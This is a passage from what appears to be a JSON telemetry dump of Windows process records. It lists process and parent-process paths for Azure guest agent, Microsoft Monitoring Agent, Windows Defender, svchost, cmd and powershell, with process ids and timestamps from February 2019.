11:55:57.567000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd682019-02-10 12:08:46.173000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd682019-02-10 12:08:46.173000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1eb42019-02-10 12:12:35.877000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x6f82019-02-10 13:12:52.733000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x6f82019-02-10 13:12:52.733000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c2019-02-10 13:16:43.013000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x16d42019-02-10 14:16:59.427000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x16d42019-02-10 14:16:59.427000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x65c2019-02-10 14:20:50.820000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd782019-02-10 15:21:06.890000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd782019-02-10 15:21:06.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12382019-02-10 15:24:56.040000\",\"NaN\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x14202019-02-09 22:54:40.460000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x14202019-02-09 22:54:40.460000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x9ac2019-02-09 22:54:40.497000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe0x10782019-02-09 22:55:15.427000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1a442019-02-09 22:54:40.470000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1a442019-02-09 22:54:40.470000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x99c2019-02-09 22:54:40.520000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x205c2019-02-09 22:55:12.353000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x205c2019-02-09 22:55:12.353000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe0xc142019-02-09 22:55:06.653000\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe0x1f242019-02-09 22:55:07.023000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\